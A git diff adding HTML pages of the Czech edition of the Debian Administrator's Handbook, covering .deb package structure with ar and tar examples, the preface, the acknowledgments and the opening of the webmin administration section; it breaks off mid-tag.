+              class="command">bzip2</code> have disappeared, you will only need to copy the missing program from another system (since each of these operates in a completely autonomous manner, without dependencies, a simple copy will suffice). If your system suffered some even more outrageous fortune, and even these don't work (maybe the deepest system libraries are missing?), you should try the static version of <code
+              class="command">busybox</code> (provided in the <span
+              class="pkg pkg">busybox-static</span> package), which is even more self-contained, and provides subcommands such as <code
+              class="command">busybox ar</code>, <code
+              class="command">busybox tar</code> and <code
+              class="command">busybox xz</code>.
+		</div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.dpkg-apt-ar"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TOOLS</em></span> <code
+                        class="command">dpkg</code>, <code
+                        class="command">APT</code> and <code
+                        class="command">ar</code></strong></p></div></div></div><a
+              id="id-1.8.5.6.2"
+              class="indexterm"></a><a
+              id="id-1.8.5.6.3"
+              class="indexterm"></a><a
+              id="id-1.8.5.6.4"
+              class="indexterm"></a><div
+              class="para">
+			<code
+                class="command">dpkg</code> is the program that handles <code
+                class="filename">.deb</code> files, notably extracting, analyzing, and unpacking them.
+		</div><div
+              class="para">
+			<code
+                class="command">APT</code> is a group of programs that allows the execution of higher-level modifications to the system: installing or removing a package (while keeping dependencies satisfied), updating the system, listing the available packages, etc.
+		</div><a
+              id="id-1.8.5.6.7"
+              class="indexterm"></a><div
+              class="para">
+			As for the <code
+                class="command">ar</code> program, it allows handling files of the same name: <code
+                class="command">ar t <em
+                  class="replaceable">archive</em></code> displays the list of files contained in such an archive, <code
+                class="command">ar x <em
+                  class="replaceable">archive</em></code> extracts the files from the archive into the current working directory, <code
+                class="command">ar d <em
+                  class="replaceable">archive</em> <em
+                  class="replaceable">file</em></code> deletes a file from the archive, etc. Its man page (<span
+                class="citerefentry"><span
+                  class="refentrytitle">ar</span>(1)</span>) documents all its other features. <code
+                class="command">ar</code> is a very rudimentary tool that a Unix administrator would only use on rare occasions, but admins routinely use <code
+                class="command">tar</code>, a more evolved archive and file management program. This is why it is easy to restore <code
+                class="command">dpkg</code> in the event of an erroneous deletion. You would only have to download the Debian package and extract the content from the <code
+                class="filename">data.tar.xz</code> archive in the system's root (<code
+                class="filename">/</code>):
+		</div><pre
+              class="screen">
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>ar x dpkg_1.18.24_amd64.deb</code></strong>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>tar -C / -p -xJf data.tar.xz</code></strong></pre></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Man page notation</strong></p></div></div></div><div
+              class="para">
+			It can be confusing for beginners to find references to “<span
+                class="citerefentry"><span
+                  class="refentrytitle">ar</span>(1)</span>” in the literature. This is generally a convenient means of referring to the man page entitled <code
+                class="literal">ar</code> in section 1.
+		</div><div
+              class="para">
+			Sometimes this notation is also used to remove ambiguities, for example to distinguish between the <code
+                class="command">printf</code> command that can also be indicated by <span
+                class="citerefentry"><span
+                  class="refentrytitle">printf</span>(1)</span> and the <code
+                class="function">printf</code> function in the C programming language, which can also be referred to as <span
+                class="citerefentry"><span
+                  class="refentrytitle">printf</span>(3)</span>.
+		</div><div
+              class="para">
+			<a
+                class="xref"
+                href="solving-problems.html">7 – „<em>Solving Problems and Finding Relevant Information</em>“</a> discusses manual pages in further detail (see <a
+                class="xref"
+                href="solving-problems.html#sect.manual-pages">7.1.1 – „Manual Pages“</a>).
+		</div></div><div
+            class="para">
+			Have a look at the content of a <code
+              class="filename">.deb</code> file:
+		</div><pre
+            class="screen"><code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>ar t dpkg_1.18.24_amd64.deb</code></strong>
+<code
+              class="computeroutput">debian-binary
+control.tar.gz
+data.tar.xz
+$ </code><strong
+              class="userinput"><code>ar x dpkg_1.18.24_amd64.deb</code></strong>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>ls</code></strong>
+<code
+              class="computeroutput">control.tar.gz  data.tar.xz  debian-binary  dpkg_1.18.24_amd64.deb
+$ </code><strong
+              class="userinput"><code>tar tJf data.tar.xz | head -n 15</code></strong>
+<code
+              class="computeroutput">./
+./etc/
+./etc/alternatives/
+./etc/alternatives/README
+./etc/cron.daily/
+./etc/cron.daily/dpkg
+./etc/dpkg/
+./etc/dpkg/dpkg.cfg
+./etc/dpkg/dpkg.cfg.d/
+./etc/logrotate.d/
+./etc/logrotate.d/dpkg
+./sbin/
+./sbin/start-stop-daemon
+./usr/
+./usr/bin/
+$ </code><strong
+              class="userinput"><code>tar tzf control.tar.gz</code></strong>
+<code
+              class="computeroutput">./
+./conffiles
+./postinst
+./md5sums
+./prerm
+./control
+./postrm
+$ </code><strong
+              class="userinput"><code>cat debian-binary</code></strong>
+<code
+              class="computeroutput">2.0</code></pre><div
+            class="para">
+			As you can see, the <code
+              class="command">ar</code> archive of a Debian package is comprised of three files:
+		</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+					<code
+                    class="filename">debian-binary</code>. This is a text file which simply indicates the version of the <code
+                    class="filename">.deb</code> file used (in 2017: version 2.0).
+				</div></li><li
+                class="listitem"><div
+                  class="para">
+					<code
+                    class="filename">control.tar.gz</code>. This archive file contains all of the available meta-information, like the name and version of the package. Some of this meta-information allows package management tools to determine if it is possible to install or uninstall it, for example according to the list of packages already on the machine.
+				</div></li><li
+                class="listitem"><div
+                  class="para">
+					<code
+                    class="filename">data.tar.xz</code>. This archive contains all of the files to be extracted from the package; this is where the executable files, documentation, etc., are all stored. Some packages may use other compression formats, in which case the file will be named differently (<code
+                    class="filename">data.tar.bz2</code> for bzip2, <code
+                    class="filename">data.tar.gz</code> for gzip).
+				</div></li></ul></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.after-first-boot.html"><strong>Předcházející</strong>4.3. After the First Boot</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.package-meta-information.html"><strong>Další</strong>5.2. Package Meta-Information</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/preface.html b/publish/cs-CZ/Debian/9/html/debian-handbook/preface.html
new file mode 100644
index 000000000..b9d779931
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/preface.html
@@ -0,0 +1,104 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Úvodní slovo</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="next"
+        href="foreword.html"
+        title="Předmluva" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/preface.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="index.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="foreword.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="preface"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="preface"></a>Úvodní slovo</h1></div></div></div><div
+          class="para">
+		Thank you for your interest in Debian. At the time of writing, more than 10% of the web is powered by Debian. Think about it; how many web sites would you have missed today without Debian?
+	</div><div
+          class="para">
+		Debian is the operating system of choice on the International Space Station, and countless universities, companies and public administrations rely on Debian to deliver services to millions of users around the world and beyond. Truly, Debian is a highly successful project and is far more pervasive in our lives than people are aware of.
+	</div><div
+          class="para">
+		But Debian is much more than “just” an operating system. First, Debian is a concrete vision of the freedoms that people should enjoy in a world increasingly dependent on computers. It is forged from the crucible of Free Software ideals where people should be in control of their devices and not the other way around. With enough knowledge you should be able to dismantle, modify, reassemble and share the software that matters to you. It doesn't matter if the software is used for frivolous or even life-threatening tasks, you should be in control of it.
+	</div><div
+          class="para">
+		Secondly, Debian is a very peculiar social experiment. Entirely volunteer-led, individual contributors take on all the responsibilities needed to keep Debian functioning rather than being delegated or assigned tasks by a company or organization. This means that Debian can be trusted to not be driven by the commercial interests or whims of companies that may not be aligned with the goal of promoting people's freedoms.
+	</div><div
+          class="para">
+		And the book you have in your hands is vastly different from other books; it is a <span
+            class="emphasis"><em>free as in freedom</em></span> book, a book that finally lives up to Debian's standards for every aspect of your digital life. You can <code
+            class="command">apt install</code> this book, you can redistribute it, you can “fork” it, and even submit bug reports and patches so that other readers may benefit from your feedback. The maintainers of this book — who are also its authors — are longstanding members of the Debian Project who truly understand the ethos that permeate every aspect of the project.
+	</div><div
+          class="para">
+		By writing and releasing this book, they are doing a truly wonderful service to the Debian community.
+	</div><div
+          class="para">
+		May 2017
+	</div><div
+          class="para">
+		Chris Lamb (Debian Project Leader)
+	</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="index.html"><strong>Předcházející</strong>The Debian Administrator's Handbook</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="foreword.html"><strong>Další</strong>Předmluva</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.acknowledgments.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.acknowledgments.html
new file mode 100644
index 000000000..eddd0aa80
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.acknowledgments.html
@@ -0,0 +1,189 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">5. Poděkování</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="foreword.html"
+        title="Předmluva" /><link
+        rel="prev"
+        href="sect.book-structure.html"
+        title="4. truktura knihy" /><link
+        rel="next"
+        href="the-debian-project.html"
+        title="Kapitola 1. Projekt Debian" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.acknowledgments.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.book-structure.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="the-debian-project.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.acknowledgments"></a>5. Poděkování</h2></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.3.9.2"></a>5.1. Trocha historie</h3></div></div></div><div
+            class="para">
+				V roce 2003, kontaktoval Nat Makarévitch Raphaëla, protože chtěl zveřejnit knihu o Debianu v kolekci <span
+              class="foreignphrase"><em
+                class="foreignphrase">Cahier de l'Admin</em></span> (Příruček pro správce), kterou měl na starosti pro Eyrolles, předního francouzského vydavatele technických knih. Raphaël okamžitě souhlasil, že ji napíše. První vydání vyšlo 14.října 2004 a mělo obrovský úspěch - bylo vyprodáno sotva o čtyři měsíce později.
+			</div><div
+            class="para">
+				Since then, we have released 7 other editions of the French book, one for each subsequent Debian release. Roland, who started working on the book as a proofreader, gradually became its co-author.
+			</div><div
+            class="para">
+				I když jsme byli samozřejmě spokojeni s úspěchem knihy, vždy jsme doufali, že Eyrolles přesvědčí nějakého mezinárodního vydavatele, aby ji přeložil do angličtiny. Obdrželi jsme četné komentáře vysvětlující, jak kniha pomohla lidem s Debianem začít a byli jsme dychtiví, aby i ostatní měli z knihy stejný prospěch.
+			</div><div
+            class="para">
+				Alas, no English-speaking editor that we contacted was willing to take the risk of translating and publishing the book. Not put off by this small setback, we negotiated with our French editor Eyrolles and got back the necessary rights to translate the book into English and publish it ourselves. Thanks to a <a
+              href="http://www.ulule.com/debian-handbook/">successful crowdfunding campaign</a>, we worked on the translation between December 2011 and May 2012. The “Debian Administrator's Handbook” was born and it was published under a free-software license!
+			</div><div
+            class="para">
+				While this was an important milestone, we already knew that the story would not be over for us until we could contribute the French book as an official translation of the English book. This was not possible at that time because the French book was still distributed commercially under a non-free license by Eyrolles.
+			</div><div
+            class="para">
+				In 2013, the release of Debian 7 gave us a good opportunity to discuss a new contract with Eyrolles. We convinced them that a license more in line with the Debian values would contribute to the book's success. That wasn't an easy deal to make, and we agreed to setup another <a
+              href="http://www.ulule.com/liberation-cahier-admin-debian/">crowdfunding campaign</a> to cover some of the costs and reduce the risks involved. The operation was again a huge success and in July 2013, we added a French translation to the Debian Administrator's Handbook.
+			</div><div
+            class="para">
+				Rádi bychom poděkovali všem, kteří se připojili k těmto kampaním veřejného financování, buďto tím, že poskytli nějaké peníze, nebo tím, že se zmínili ve svém okolí. Bez vás bychom to nezvládli.
+			</div><div
+            class="para">
+				To save some paper, 5 years after the fundraising campaigns and after two subsequent editions, we dropped the list of persons who opted to be rewarded with a mention of their name in the book. But their names are engraved in the acknowledgments of the Wheezy edition of the book: <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://debian-handbook.info/browse/wheezy/sect.acknowledgments.html">https://debian-handbook.info/browse/wheezy/sect.acknowledgments.html</a></div>
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.3.9.3"></a>5.2. Zvláštní poděkování přispěvatelům</h3></div></div></div><div
+            class="para">
+				Tato kniha by nebyla tím, čím je, bez přispění několika osob, které hrály důležitou roli během překladatelské fáze i mimo ni. Rádi bychom poděkovali Marilyne Brun, která nám pomohla přeložit vzorovou kapitolu a která s námi pracovala na definování některých společných překladatelských pravidel. Revidovala také několik kapitol, které zoufale potřebovaly dopracovat. Děkuji Anthony Baldwinovi (z Baldwin Linguas), který pro nás překládal několik kapitol.
+			</div><div
+            class="para">
+				Těžíme z velkorysé pomoci korektorů: Daniel Phillips, Gerold Rupprecht, Gordon ony, Jákob Owens, a tom Syroid. Každý z nich zrevidoval mnoho kapitol. Mockrát děkuji!
+			</div><div
+            class="para">
+				Poté, co anglická verze byla uvolněna, jsme samozřejmě dostali spoustu ohlasů, návrhů na opravy od čtenářů, a ještě více od mnoha týmů, které se zavázali přeložit tuto knihu do ostatních jazyků. Díky!
+			</div><div
+            class="para">
+				Chtěli bychom také poděkovat čtenářům francouzské knihy, kteří nám poskytli ohlasy, co potvrzovaly, že kniha opravdu stála za to ji přeložit, děkuji: Christian Perrier, David Bercot, Étienne Liétart, a Gilles Roussi. Stefano Zacchiroli - který byl vedoucím projektu Debian během kampaně veřejného financování - si také zaslouží velké poděkování, on laskavě schválil projekt s vysvětlujícím sdělením, že svobodné (as in freedom) knihy bylo více než třeba.
+			</div><div
+            class="para">
+				Máte-li to potěšení číst tyto řádky v brožované kopii knihy, pak byste se měli připojit k nám a poděkovat Benoît Guillonovi, Jean-Côme Charpentierovi, a Sébastienu Menginovi, kteří pracovali na vnitřním designu knihy. Benoît je upstream autor <a
+              href="http://dblatex.sourceforge.net"> dblatexu </a> — nástroje, který jsme použili pro převedení DocBooku na LaTeX (a pak PDF). Sébastien je designér, který vytvořil tento pěkný knižní layout a Jean-Côme je odborník na LaTeX, který jej implementoval jako StyleSheet použitelný s dblatexem. Děkuji vám kluci za všechnu tvrdou práci!
+			</div><div
+            class="para">
+				A konečně, děkuji Thierry Stempfelovi za pěkné obrázky uvádějící každou kapitolu, a děkuji Doru Patrascoci za krásný obal této knihy.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.3.9.4"></a>5.3. Díky překladatelům</h3></div></div></div><div
+            class="para">
+				Ever since the book has been freed, many volunteers have been busy translating it to numerous languages, such as Arabic, Brazilian Portuguese, German, Italian, Spanish, Japanese, Norwegian Bokmål, etc. Discover the full list of translations on the book's website: <a
+              href="http://debian-handbook.info/get/#other">http://debian-handbook.info/get/#other</a>
+			</div><div
+            class="para">
+				Rádi bychom poděkovali všem překladatelům a recenzentům překladů. Vaše práce je vysoce ceněna, protože přináší Debian do rukou miliónů lidí, kteří neumí číst anglicky.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.3.9.5"></a>5.4. Osobní poděkování od Raphaëla</h3></div></div></div><div
+            class="para">
+				Za prvé, rád bych poděkoval Natovi Makarévitchovi, který mi nabídl možnost napsat tuto knihu a který mi poskytl pevné vedení, během roku, který byl potřeba k jejímu dokončení. Děkuji také bezva týmu v Eyrolles, a Muriele Shan SEI Fanové zejména. Byla se mnou velmi trpělivá a hodně jsem se s ní naučil.
+			</div><div
+            class="para">
+				Období kampaní na Ulule bylo pro mě velmi náročné, ale chtěl bych poděkovat všem, kteří pomáhali, aby byly úspěšné, a zejména týmu Ulule, který reagoval velmi rychle na mnoho mých požadavků. Děkuji také všem, kteří propagovali tyto akce. Nemám žádný vyčerpávající seznam (a kdybych měl, byl by pravděpodobně příliš dlouhý), ale rád bych poděkoval několika lidem, kteří se mnou byli v kontaktu: Joey-Elijah Sneddon a Benjamin Humphrey z OMG! Ubuntu, Florent Zara z LinuxFr.org, Manu z Korben.info, Frédéric Couchet z April.org, Jake Edge z Linux Weekly News, Clement Lefebvre z Linux Mint, Ladislav Bodnar z DistroWatch, Steve kemp z Debian-Administration.org, Christian Pfeiffer Jensen z Debian-News.net, Artem Nosulchik z LinuxScrew.com, Stephan Ramoin z Gandi.net, Matthew Bloch z Bytemark.co.uk, tým na Divergence FM, Rikki Kite z Linux New Media, Jono Bacon, marketingový tým Eyrolles, a mnoho dalších, na které jsem zapomněl (omlouvám se za to).
+			</div><div
+            class="para">
+				Chtěl bych se zaměřit na zvláštní poděkování Rolandu Masovi, mému spoluautorovi. Spolupracujeme na této knize od začátku a on byl vždy připraven na tuto výzvu. A musím říci, že dokončení Administrátorské příručky bylo hodně práce...
+			</div><div
+            class="para">
+				V neposlední řadě děkuji své manželce Sophii. Ona mě velmi podporuje v mé práci na této knize a na Debianu všeobecně. Bylo příliš mnoho dní (a nocí), kdy jsem ji nechal samotnou s našimi dvěma syny, abych v práci na knize udělal nějaký pokrok. Jsem vděčný za její podporu a vím, jaké mám štěstí, že ji mám.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.3.9.6"></a>5.5. Osobní poděkování od Rolanda</h3></div></div></div><div
+            class="para">
+				Takže Raphaël mě už předešel ve většině poděkování. Stejně ještě zdůrazím své osobní poděkování dobrým lidem v Eyrolles, s nimiž spolupráce byla vždy příjemná a snadná. Doufejme, že výsledky jejich vynikajícího sdělení nebyly ztraceny v překladu.
+			</div><div
+            class="para">
+				Jsem nesmírně vděčný Raphaëlovi za převzetí administrativní části tohoto anglického vydání. Od organizování kampaně na financování po poslední detaily rozvržení knihy, vydávat přeloženou knihu je mnohem víc než jen překládání a korektury, a Raphaël udělal (nebo delegoval a kontroloval) to všechno. Takže díky.
+			</div><div
+            class="para">
+				Děkujeme také všem, kteří více či méně přímo přispěli k této knize, tím, že poskytnuli objasnění nebo vysvětlení, nebo překladatelské rady. Je jich příliš mnoho na to je zmínit, ale většinu z nich lze obvykle nalézt na různých #debian-* IRC kanálech.
+			</div><div
+            class="para">
+				Je tu samozřejmě určité překrytí s předchozí skupinou lidí, ale zvláštní poděkování je jistě v pořádku lidem, kteří nyní dělají Debian. Bez nich by z knihy moc nebylo, a já jsem stále ohromen tím, co projekt Debian jako celek produkuje a zpřístupňuje každému a všem.
+			</div><div
+            class="para">
+				Další osobní poděkování patří mým přátelům a mým klientům, za jejich porozumění, když jsem byl méně vstřícný, protože jsem pracoval na této knize, a také pro jejich neustálou podporu, povzbuzení a hecování. Oni vědí o kom mluvím. Díky.
+			</div><div
+            class="para">
+				And finally; I am sure they would be surprised by being mentioned here, but I would like to extend my gratitude to Terry Pratchett, Jasper Fforde, Tom Holt, William Gibson, Neal Stephenson, and of course the late Douglas Adams. The countless hours I spent enjoying their books are directly responsible for my being able to take part in translating one first and writing new parts later.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.book-structure.html"><strong>Předcházející</strong>4. truktura knihy</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="the-debian-project.html"><strong>Další</strong>Kapitola 1. Projekt Debian</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.administration-interfaces.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.administration-interfaces.html
new file mode 100644
index 000000000..9b6bc6775
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.administration-interfaces.html
@@ -0,0 +1,217 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">9.4. Administration Interfaces</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="System boot, Initscripts, SSH, Telnet, Rights, Permissions, Supervision, Inetd, Cron, Backup, Hotplug, PCMCIA, APM, ACPI" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><link
+        rel="prev"
+        href="sect.rights-management.html"
+        title="9.3. Managing Rights" /><link
+        rel="next"
+        href="sect.syslog.html"
+        title="9.5. syslog System Events" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.administration-interfaces.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.rights-management.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.syslog.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.administration-interfaces"></a>9.4. Administration Interfaces</h2></div></div></div><a
+          id="id-1.12.7.2"
+          class="indexterm"></a><a
+          id="id-1.12.7.3"
+          class="indexterm"></a><div
+          class="para">
+			Using a graphical interface for administration is interesting in various circumstances. An administrator does not necessarily know all the configuration details for all their services, and doesn't always have the time to go seeking out the documentation on the matter. A graphical interface for administration can thus accelerate the deployment of a new service. It can also simplify the setup of services which are hard to configure.
+		</div><div
+          class="para">
+			Such an interface is only an aid, and not an end in itself. In all cases, the administrator must master its behavior in order to understand and work around any potential problem.
+		</div><div
+          class="para">
+			Since no interface is perfect, you may be tempted to try several solutions. This is to be avoided as much as possible, since different tools are sometimes incompatible in their work methods. Even if they all aim to be very flexible and try to adopt the configuration file as a single reference, they are not always able to integrate external changes.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.webmin"></a>9.4.1. Administrating on a Web Interface: <code
+                    class="command">webmin</code></h3></div></div></div><a
+            id="id-1.12.7.7.2"
+            class="indexterm"></a><div
+            class="para">
+				This is, without a doubt, one of the most successful administration interfaces. It is a modular system managed through a web browser, covering a wide array of areas and tools. Furthermore, it is internationalized and available in many languages.
+			</div><div
+            class="para">
+				Sadly, <code
+              class="command">webmin</code> is no longer part of Debian. Its Debian maintainer — Jaldhar H. Vyas — removed the packages he created because he no longer had the time required to maintain them at an acceptable quality level. Nobody has officially taken over, so <span
+              class="distribution distribution">Jessie</span> does not have the <code
+              class="command">webmin</code> package.
+			</div><div
+            class="para">
+				There is, however, an unofficial package distributed on the <code
+              class="literal">webmin.com</code> website. Contrary to the original Debian packages, this package is monolithic; all of its configuration modules are installed and activated by default, even if the corresponding service is not installed on the machine.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>SECURITY</em></span> Changing the root password</strong></p></div></div></div><div
+              class="para">
+				On the first login, identification is conducted with the root username and its usual password. It is recommended to change the password used for <code
+                class="command">webmin</code> as soon as possible, so that if it is compromised, the root password for the server will not be involved, even if this confers important administrative rights to the machine.
+			</div><div
+              class="para">
+				Beware! Since <code
+                class="command">webmin</code> has so many features, a malicious user accessing it could compromise the security of the entire system. In general, interfaces of this kind are not recommended for important systems with strong security constraints (firewall, sensitive servers, etc.).
+			</div></div><div
+            class="para">
+				Webmin is used through a web interface, but it does not require Apache to be installed. Essentially, this software has its own integrated mini web server. This server listens by default on port 10000 and accepts secure HTTP connections.
+			</div><div
+            class="para">
+				Included modules cover a wide variety of services, among which:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						all base services: creation of users and groups, management of <code
+                    class="filename">crontab</code> files, init scripts, viewing of logs, etc.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						bind: DNS server configuration (name service);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						postfix: SMTP server configuration (e-mail);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						inetd: configuration of the <code
+                    class="command">inetd</code> super-server;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						quota: user quota management;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						dhcpd: DHCP server configuration;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						proftpd: FTP server configuration;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						samba: Samba file server configuration;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						software: installation or removal of software from Debian packages and system updates.
+					</div></li></ul></div><div
+            class="para">
+				The administration interface is available in a web browser at <code
